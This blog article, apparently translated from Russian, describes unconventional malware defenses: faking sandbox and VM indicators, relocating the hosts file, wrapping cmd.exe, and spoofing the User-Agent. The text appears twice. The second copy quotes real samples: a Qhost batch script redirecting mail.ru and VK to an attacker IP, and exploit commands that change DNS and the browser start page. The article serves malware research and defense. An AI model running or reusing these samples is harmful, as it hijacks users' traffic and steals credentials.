March 11, 2013 at 16:00Unobvious malware protection methods
In disputes and discussions on how to protect your computer from malware, many copies are broken and many books and articles can be found on this topic, most of which simply duplicate each other, telling the same thing in different words. It is extremely difficult for anyone interested in information security in such discussions and articles to meet something new about protection that he did not know before or simply did not think about it ... but no matter how arrogant it sounds, I will try to awaken at least a bit of interest in this hackneyed topic and I’ll tell you about unobvious methods of protection, omitting the senile grumbling that you need to update plugins to browsers in time, do not click on left links, etc.
In this short article about some interesting features of the functioning of malware, I urge you to abandon the antivirus and other methods of self-defense - updates, program settings and attentiveness when clicking on links and launching applications ... we add the word “NOT” to the word “call” and everything will be on their places.
This article should be considered only as an unusual overview of the general actions in the behavior of malvari, against which we can create a defense that should be regarded more as “oh, cool, the malware does not work!” And as some highlight found in viral research.
It’s worth starting with the fact that the most non-obvious protection is the use of a user account, not an administrator, but because only a few are capable of such a sacrifice, and the majority with admin rights, we won’t return to this unpleasant topic, but we will have this in view of all the same stands, suddenly someday, but come in handy.
[offtopic] my direct language is itching to scream that the java plugin needs to be turned off, and only enable it if necessary, that viewing pdf in the browser is not particularly needed, therefore it is better to save files to hard, and then watch them through some left one, nobody it’s not an interesting pdf viewer that on XP you can turn off autorun from flash drives by entering a couple of lines in the registry, that ..., but all these semi-obvious protection methods are known from me, therefore I ask everyone to forgive me: those who expected a complete analysis of the protection PC for the fact that he will not be, and those who expected only the new - for what I remembered about this classic. [/ offtopic]
I’m a cloud, a cloud, a cloud, but not a bear at all
Quite a few malvari (although rather their creators) are aware of the existence of antiviruses, virus analysts, automatic analysis systems and other infrastructure of the “corporation of goodness” and are trying in every possible way to complicate their lives and extend the life of their crafts, using various technical methods to complicate the analysis of malware and overlay on him a detective. The simplest example of this is crypto / packaging, which kills immediately a small herd of rabbits:
- if the malware is detected, then repacked it and again in chocolate
- disassemblers / static analyzers become useless (you need manual analysis with a debugger)
- not every antivirus emulator will spin even a simple one cryptor
An example is the most banal, designed to show which way hackers think (they should be called criminals in the right way, but such a tradition has gone from somewhere to replace concepts ...). And the thought is the following (on behalf of the Malvari): if I feel that they are investigating me, then I will not harm me, so that they do not understand how I work or do not understand my evil essence. It defines its “experience” as follows:
1. Detection of a launch under online behavior analysis services (Anubis, ThreatExpert, ...)
is performed by checking the name of the computer, user, finding certain dll libraries in the address space, the key of the
operating system.
2. Virtual machine discovery (VMWare, SandBox)
By searching for specific processes, registry keys, hardware, identifying differences with the usual system using different assembler tricks.
3. Debugger Detection
Checking certain bytes in the environment, searching for a window, process, driver.
4. Detection of active / passive monitoring utilities (RegMon, FileMon, RegShot)
This is usually implemented by searching for a window by its title.
The essence of this anti-virus protection is ugly simple - to let the malvari understand that they are investigating it and she herself will abandon her evil intentions. Moving from theory to practice (within reasonable limits), we can say the following (on similar points):
1. The name of the user and computer is sandbox.
2.Process in the system: vmware.exe, VMwareTray.exe. HKLM \ SYSTEM \ ControlSet001 \ Services \ vmware section. The vmnet.sys file in drivers.
3. Many detect the SoftIce driver - just run it, it will throw the driver and that's it (yes, they are still looking for it!). Window with class "OllyDBG".
4. Windows with the heading "File Monitor - Sysinternals: www.sysinternals.com ", "Registry Monitor - Sysinternals: www.sysinternals.com ".
In fact, all this is simple to do (if you want): when installing the system, set certain names, create a pair of keys / files, write a tool that will keep several windows with certain names invisible, and call the tool itself vmware.exe.
VKontakte disabled for non-paid hosting
Here it’s funny for you, and something similar on their screens can be watched by many of our compatriots. Qhost class Trojans are very popular, whose task is to stupidly edit the hosts file and self-delete, so the addresses of popular social networks (VKontakte, classmates) are assigned the left IP address ... and the person will lose his username / password, and even send an SMS ...
Despite the technological simplicity of creation, these Trojans bring a big profit to the creators - a minimum of effort and in the short term a lot of VKontakte accounts and money. The hosts file is edited either directly (opening-> recording) or through shells (creating and launching bat / vbs) - everything is very simple: along a certain fixed path (C: \ WINDOWS \ system32 \ drivers \ etc \ hosts) lies the file in the end of which you need to add a few lines - this is the second programming lesson in any language after hello world'a! And here there is a little trick of protection, the fact is that the path to the etc folder is specified in the registry and if you change the path to another folder (put all the files from the previous one there and rub it from etc), the Trojan will be somewhat surprised ...
Here is the key:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters \\ DataBasePath
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ Tcpip \ Parameters \\ DataBasePath (and other 00X keys, respectively).
The level of intelligence and nationality of the authors of some Trojans of this class can be suggested even without looking at the code:
Batniks have approximately (simplified - obfuscation removed, only the TANGLE variable is left for a clear understanding of how bat files are obfuscated) the following contents:
Do you see the console? Not? But it exists ...
When exploiting a vulnerability, the shell code very often performs different actions by manipulating cmd.exe, since it’s easy to run it (the system even finds the path to it itself) and there are few letters in it and it is in the system, which is very common for shellcode it is important, especially in the light of the latest technologies, changing addresses of everything that is possible in the address space.
Therefore, our main task is to put hackers here and a kind of fat, suspiciously grunting pig: you can replace the system cmd.exe (including its copies in dllcache, i386, $ NtServicePackUninstall $) with our stub, which, when called, will save the passed parameters to the buffer and issue an alert “Continue, if not”, and if you agree, it will start the normal cmd with the same parameters (previously put next to it in the renamed form).
Modern malware does a lot of critical actions in the system by running cmd.exe with a kilometer-long parameters (for example, making changes to the same hosts).
The stub can be complicated by adding to it the ability to read from the config on which processes do not issue an alert about the launch, but immediately pass the parameters to the new cmd.
This thought began to take shape, grow and grow stronger when observing the constant rapprochement of the malware and cmd.exe - they became direct best friends and even more - it is direct to them Taras Bulba: he spawns, he kills himself - when the exploit is triggered, he often launches the downloaded the malware and the self-deletion method are also implemented through the bat-file, and during its operation, the malware sometimes loads the shell with work.
Separately, I want to note the existence of incorporeal malware that does not have a thin exe file in the system, but java does everything - the exploit tells it what to do and it obediently executes. Here is a life example (the java.exe process produces these actions):
For myself, for research purposes, such a utility was written, if you need the source code or the tool itself, then you can contact me and I will give it to you without any problems, I do not mind.
In this paragraph, it is worth noting one more important detail that imposes strict restrictions on the use of this protection method on a real system: if you are a licensed user of the Immunity antivirus, then from our left cmd.exe there will be a lot of requests for launching batch files.
Linux to the right, Windows to the left.
It is known that most of the malware come to our computer through a window on the Internet - through the browser and its plug-ins, therefore by setting protection at this stage (File - Work offline ... joke) we will cut off the lion's share of threats. To do this, briefly consider the principle of the exploit pack:
1.Information about the browser and its version, operating system and language 2 is extracted from the User Agent
. Depending on the results of the first paragraph (see below), there is a determination of which plug-ins are in general and exploitation of their vulnerability, or if there is nothing suitable among the existing exploits nothing bad happens
Of course, there are exceptions when, regardless of anything, all exploits are immediately pushed into the page code (at least something will work), but most exploit packs keep statistics, country records, have a beautiful interface and other goodies and settings. Therefore, the philosophy of protection is as follows: you need to change the User Agent and indicate there that against which there is definitely no exploit reserve, for example Linux. Ideally, of course, it would be altogether to replace UserAgent with a Linux browser with some completely, but in theory this can lead to slight distortions of pages on some sites, although I did not notice this.
All popular bundles (the same Blackhole exploit kit) will send you a moment to communicate with Google, even without trying to try the exploit on your browser.
Instead of output
The article should not be taken in any way as a call to abandon the antivirus and other reasonable means of protection that you all know about. It’s just that now, in addition to them, you can either use the methods voiced by me or not use them, but simply know about the existence of such obstacles in the life path of the malware.
In this short article about some interesting features of the functioning of malware, I urge you to abandon the antivirus and other methods of self-defense - updates, program settings and attentiveness when clicking on links and launching applications ... we add the word “NOT” to the word “call” and everything will be on their places.
This article should be considered only as an unusual overview of the general actions in the behavior of malvari, against which we can create a defense that should be regarded more as “oh, cool, the malware does not work!” And as some highlight found in viral research.
It’s worth starting with the fact that the most non-obvious protection is the use of a user account, not an administrator, but because only a few are capable of such a sacrifice, and the majority with admin rights, we won’t return to this unpleasant topic, but we will have this in view of all the same stands, suddenly someday, but come in handy.
[offtopic] my direct language is itching to scream that the java plugin needs to be turned off, and only enable it if necessary, that viewing pdf in the browser is not particularly needed, therefore it is better to save files to hard, and then watch them through some left one, nobody it’s not an interesting pdf viewer that on XP you can turn off autorun from flash drives by entering a couple of lines in the registry, that ..., but all these semi-obvious protection methods are known from me, therefore I ask everyone to forgive me: those who expected a complete analysis of the protection PC for the fact that he will not be, and those who expected only the new - for what I remembered about this classic. [/ offtopic]
I’m a cloud, a cloud, a cloud, but not a bear at all
Quite a few malvari (although rather their creators) are aware of the existence of antiviruses, virus analysts, automatic analysis systems and other infrastructure of the “corporation of goodness” and are trying in every possible way to complicate their lives and extend the life of their crafts, using various technical methods to complicate the analysis of malware and overlay on him a detective. The simplest example of this is crypto / packaging, which kills immediately a small herd of rabbits:
- if the malware is detected, then repacked it and again in chocolate
- disassemblers / static analyzers become useless (you need manual analysis with a debugger)
- not every antivirus emulator will spin even a simple one cryptor
An example is the most banal, designed to show which way hackers think (they should be called criminals in the right way, but such a tradition has gone from somewhere to replace concepts ...). And the thought is the following (on behalf of the Malvari): if I feel that they are investigating me, then I will not harm me, so that they do not understand how I work or do not understand my evil essence. It defines its “experience” as follows:
1. Detection of a launch under online behavior analysis services (Anubis, ThreatExpert, ...)
is performed by checking the name of the computer, user, finding certain dll libraries in the address space, the key of the
operating system.
2. Virtual machine discovery (VMWare, SandBox)
By searching for specific processes, registry keys, hardware, identifying differences with the usual system using different assembler tricks.
3. Debugger Detection
Checking certain bytes in the environment, searching for a window, process, driver.
4. Detection of active / passive monitoring utilities (RegMon, FileMon, RegShot)
This is usually implemented by searching for a window by its title.
The essence of this anti-virus protection is ugly simple - to let the malvari understand that they are investigating it and she herself will abandon her evil intentions. Moving from theory to practice (within reasonable limits), we can say the following (on similar points):
1. The name of the user and computer is sandbox.
2.Process in the system: vmware.exe, VMwareTray.exe. HKLM \ SYSTEM \ ControlSet001 \ Services \ vmware section. The vmnet.sys file in drivers.
3. Many detect the SoftIce driver - just run it, it will throw the driver and that's it (yes, they are still looking for it!). Window with class "OllyDBG".
4. Windows with the heading "File Monitor - Sysinternals: www.sysinternals.com ", "Registry Monitor - Sysinternals: www.sysinternals.com ".
In fact, all this is simple to do (if you want): when installing the system, set certain names, create a pair of keys / files, write a tool that will keep several windows with certain names invisible, and call the tool itself vmware.exe.
VKontakte disabled for non-paid hosting
Here it’s funny for you, and something similar on their screens can be watched by many of our compatriots. Qhost class Trojans are very popular, whose task is to stupidly edit the hosts file and self-delete, so the addresses of popular social networks (VKontakte, classmates) are assigned the left IP address ... and the person will lose his username / password, and even send an SMS ...
Despite the technological simplicity of creation, these Trojans bring a big profit to the creators - a minimum of effort and in the short term a lot of VKontakte accounts and money. The hosts file is edited either directly (opening-> recording) or through shells (creating and launching bat / vbs) - everything is very simple: along a certain fixed path (C: \ WINDOWS \ system32 \ drivers \ etc \ hosts) lies the file in the end of which you need to add a few lines - this is the second programming lesson in any language after hello world'a! And here there is a little trick of protection, the fact is that the path to the etc folder is specified in the registry and if you change the path to another folder (put all the files from the previous one there and rub it from etc), the Trojan will be somewhat surprised ...
Here is the key:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters \\ DataBasePath
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ Tcpip \ Parameters \\ DataBasePath (and other 00X keys, respectively).
The level of intelligence and nationality of the authors of some Trojans of this class can be suggested even without looking at the code:
Batniks have approximately (simplified - obfuscation removed, only the TANGLE variable is left for a clear understanding of how bat files are obfuscated) the following contents:
SET TEATEATEA =% windir% \ System32 \ drivers \ etc \ hosts
SET TANGLE = .co
echo 66.55.140.181 my.mail.ru >>% TEATEATEA%
echo 66.55.140.181 m.my.mail.ru >>% TEATEATEA%
echo 66.55.140.181 vk% TANGLE% m >>% TEATEATEA%
Do you see the console? Not? But it exists ...
When exploiting a vulnerability, the shell code very often performs different actions by manipulating cmd.exe, since it’s easy to run it (the system even finds the path to it itself) and there are few letters in it and it is in the system, which is very common for shellcode it is important, especially in the light of the latest technologies, changing addresses of everything that is possible in the address space.
Therefore, our main task is to put hackers here and a kind of fat, suspiciously grunting pig: you can replace the system cmd.exe (including its copies in dllcache, i386, $ NtServicePackUninstall $) with our stub, which, when called, will save the passed parameters to the buffer and issue an alert “Continue, if not”, and if you agree, it will start the normal cmd with the same parameters (previously put next to it in the renamed form).
Modern malware does a lot of critical actions in the system by running cmd.exe with a kilometer-long parameters (for example, making changes to the same hosts).
The stub can be complicated by adding to it the ability to read from the config on which processes do not issue an alert about the launch, but immediately pass the parameters to the new cmd.
This thought began to take shape, grow and grow stronger when observing the constant rapprochement of the malware and cmd.exe - they became direct best friends and even more - it is direct to them Taras Bulba: he spawns, he kills himself - when the exploit is triggered, he often launches the downloaded the malware and the self-deletion method are also implemented through the bat-file, and during its operation, the malware sometimes loads the shell with work.
Separately, I want to note the existence of incorporeal malware that does not have a thin exe file in the system, but java does everything - the exploit tells it what to do and it obediently executes. Here is a life example (the java.exe process produces these actions):
cmd.exe / C "ChCp 1251 & netsh interface ip set dns name =" Local Area Connection "source = static addr = 5.199.140.178"
reg add "hkcu \ Software \ Microsoft \ Internet Explorer \ Main" / v "Start Page" / t REG_SZ / f / d "pc: //dubsearch.ru"
For myself, for research purposes, such a utility was written, if you need the source code or the tool itself, then you can contact me and I will give it to you without any problems, I do not mind.
In this paragraph, it is worth noting one more important detail that imposes strict restrictions on the use of this protection method on a real system: if you are a licensed user of the Immunity antivirus, then from our left cmd.exe there will be a lot of requests for launching batch files.
Linux to the right, Windows to the left.
It is known that most of the malware come to our computer through a window on the Internet - through the browser and its plug-ins, therefore by setting protection at this stage (File - Work offline ... joke) we will cut off the lion's share of threats. To do this, briefly consider the principle of the exploit pack:
1.Information about the browser and its version, operating system and language 2 is extracted from the User Agent
. Depending on the results of the first paragraph (see below), there is a determination of which plug-ins are in general and exploitation of their vulnerability, or if there is nothing suitable among the existing exploits nothing bad happens
Of course, there are exceptions when, regardless of anything, all exploits are immediately pushed into the page code (at least something will work), but most exploit packs keep statistics, country records, have a beautiful interface and other goodies and settings. Therefore, the philosophy of protection is as follows: you need to change the User Agent and indicate there that against which there is definitely no exploit reserve, for example Linux. Ideally, of course, it would be altogether to replace UserAgent with a Linux browser with some completely, but in theory this can lead to slight distortions of pages on some sites, although I did not notice this.
All popular bundles (the same Blackhole exploit kit) will send you a moment to communicate with Google, even without trying to try the exploit on your browser.
Instead of output
The article should not be taken in any way as a call to abandon the antivirus and other reasonable means of protection that you all know about. It’s just that now, in addition to them, you can either use the methods voiced by me or not use them, but simply know about the existence of such obstacles in the life path of the malware.